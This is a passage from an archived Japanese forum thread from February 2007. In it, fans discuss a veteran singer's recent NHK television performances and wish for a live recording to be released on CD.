いままでどれだけアルバムに入れているか知りたいけど・・


136 :NO MUSIC NO NAME:2007/02/13(火) 16:50:40 ID:WSj3axYj
落ちたの

137 :NO MUSIC NO NAME:2007/02/13(火) 17:16:55 ID:E0Q2ke9L
NHKホールの「ひとりぼっちの栄光」をCD化してほしい

138 :NO MUSIC NO NAME:2007/02/14(水) 01:09:34 ID:IlmI5pSj
昨日のNHK「歌謡コンサート」に出ていたが…


139 :NO MUSIC NO NAME:2007/02/17(土) 22:12:18 ID:iz7hC+mi
私鉄沿線歌ってたけど、苦しそうだったですね

140 :NO MUSIC NO NAME:2007/02/19(月) 14:14:27 ID:IzgkQrfp
今朝のラジオで中条きよしが歌謡コンサートの話してて
自分が一番年上なのに一番若かった。特にゴローどうしちゃったの?
なんとかすればいいのにって言ってた・・・ケッ




141 :NO MUSIC NO NAME:2007/02/19(月) 22:47:50 ID:hbkssdmj
中条きよしは全盛期のゴローを知ってるからね
でも、BSにっぽんの歌(17日放送)のゴローはまあまあでしたよ

142 :NO MUSIC NO NAME:2007/02/23(金) 18:27:41 ID:GTIeTl47
バースデイおめでとうございます。

30 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)